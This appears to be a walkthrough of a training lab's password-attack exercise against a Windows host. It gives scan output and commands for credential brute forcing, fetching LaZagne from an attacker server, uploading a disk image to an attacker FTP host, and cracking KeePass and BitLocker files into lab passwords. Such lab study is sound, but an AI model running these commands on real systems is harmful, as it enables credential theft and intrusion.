Password Attacks Lab - Hard
June 16, 2024
# Nmap 7.94SVN scan initiated Sun Jun 16 15:00:07 2024 as: nmap -sC -sV -oN nmap -Pn -vv 10.129.130.245
Nmap scan report for 10.129.130.245
Host is up, received user-set (0.29s latency).
Scanned at 2024-06-16 15:00:07 PST for 108s
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
2049/tcp open status syn-ack 1 (RPC #100024)
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-06-16T07:01:50+00:00; +5s from scanner time.
| rdp-ntlm-info:
| Target_Name: WINSRV
| NetBIOS_Domain_Name: WINSRV
| NetBIOS_Computer_Name: WINSRV
| DNS_Domain_Name: WINSRV
| DNS_Computer_Name: WINSRV
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-16T07:01:41+00:00
| ssl-cert: Subject: commonName=WINSRV
| Issuer: commonName=WINSRV
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-15T06:59:35
| Not valid after: 2024-12-15T06:59:35
| MD5: eceb:7c31:f237:0403:721c:7a4f:2dbb:a514
| SHA-1: 7df6:a481:957d:47d9:b182:d24f:5295:8c30:e26f:9769
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQSiFnTc+vRL1Oo+PP3CWI0DANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZXSU5TUlYwHhcNMjQwNjE1MDY1OTM1WhcNMjQxMjE1MDY1OTM1
| WjARMQ8wDQYDVQQDEwZXSU5TUlYwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDd0f4RooI9OBZTAbwuOwaZA6xdUrGl3+P8McHSVUY1yGlk0fVW707f+r1I
| tuqPZxE9cvEhFFkpsA0Vm2iGPJvBkQ1RJr9Boc4xouqkAgtbl5NvsPvvJ4+bqXNG
| v2b6ZDqOG4YcPsnUvUsrwuUp4cVyysItobLshgBb7Qf0AdpJhuhmifreyzVcPKav
| KlkJ8tNBJEIq8sA8J390ux3tSCIxWBjWaWy7zS/dnMotAfVT/obhVoMrZtkmu7ZW
| f1RRIP9olZnA974Af54gtMtHa2NoZ741/SDsseNNACQEkzCqqyT2X8z1g7M7wcEo
| 3CVqs8E444rN0dsQz3BGr8EQYrh9AgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEARGR0HfptXq8AwkYM
| oaUoZDgzMsCFDSx7HrcVkPKO7Exv5TTW73r90MgjHTqL5WFMf3cPsByH1SBJR3pl
| aq+vGeooP72V7XArtHlSUHKLuf6yutIcmW23wEDcPfUeiBrOS9+XzKC2zH1gNmTn
| 7ZzjWuH2l6U8QpuxdpfjONlpRc3OyxSutg9kPJVsRCrYOxhIicG3iZCDCXzkEnRs
| UsQ6mk4ft/Q43vmV3pIDcS+QOZFQYhJjESOMFWSgARA9HI5oO3PbAnY6jsgkZmkz
| wQwFfvWkYiqjWlbzzH6CkmVhMsp4TghlanNw57fJlizslb8sUkXxtun2y/TvBRze
| hWGcUw==
|_-----END CERTIFICATE-----
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 18946/tcp): CLEAN (Couldn't connect)
| Check 2 (port 57309/tcp): CLEAN (Couldn't connect)
| Check 3 (port 63004/udp): CLEAN (Failed to receive data)
| Check 4 (port 10241/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-06-16T07:01:42
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 4s, deviation: 0s, median: 4s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 16 15:01:55 2024 -- 1 IP address (1 host up) scanned in 108.21 secondsmsfconsole -q
use smb_login
set rhost
runpoetry run crackmapexec smb 10.129.130.245 -u Johanna -p /home/kyou/academy-htb/password-attacks/medium-lab/mut_password.list --local-auth
Johanna:1231234!xfreerdp /v:10.129.130.245 /u:Johanna /p:1231234!wget http://10.10.14.251:8000/LaZagne.exe -OutFile lazagne.exefindstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
more AppData\Local\Google\Chrome\"User Data"\ZxcvbnData\1\passwords.txt
[Convert]::ToBase64String((Get-Content -path "C:\Users\johanna\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt" -Encoding byte))
echo 'The result from above command' | base64 -d > passwords.txtwc passwords.txt
[Convert]::ToBase64String((Get-Content -path "C:\Users\johanna\Documents\Logins.kdbx" -Encoding byte))
Get-FileHash "C:\Users\johanna\Documents\Logins.kdbx" -Algorithm MD5 | select Hash
md5sum Logins.kdbx
sudo keepass2john Logins.kdbx > forjohn
cat forjohn
sudo john --wordlist=../medium-lab/mut_password.list forjohn
Qwerty7!david:gRzX7YbeTcDG7
Now i can run cmd as different user
First we setup our ftp server
sudo python3 -m pyftpdlib --port 21 --write
Then just use this command to upload to our ftpserver / attacker machine
(New-Object Net.WebClient).UploadFile('ftp://10.10.14.2/Backup.vhd', 'C:\Users\david\Documents\David\Backup.vhd')
sudo bitlocker2john -i Backup.vhd > backup.hashes
grep "bitlocker\$0" backup.hashes > backup.hash
cat backup.hash
john --wordlist=../medium-lab/mut_password.list backup.hash
123456789!sudo losetup -fP Backup.vhd
sudo losetup -a
lsblk
sudo dislocker /dev/loop8p2 -u'123456789!' -- /mnt/bitlockersudo mount -o loop /mnt/bitlocker/dislocker-file /mnt/bitlocker_mount
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
hash NTLM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e53d4d912d96874e83429886c7bf22a1:::
Administrator:Liverp00l8!
Then just umount the files
sudo umount /mnt/bitlocker_mount
sudo umount /mnt/bitlocker
sudo rmdir /mnt/bitlocker_mount
sudo rmdir /mnt/bitlocker
Last updated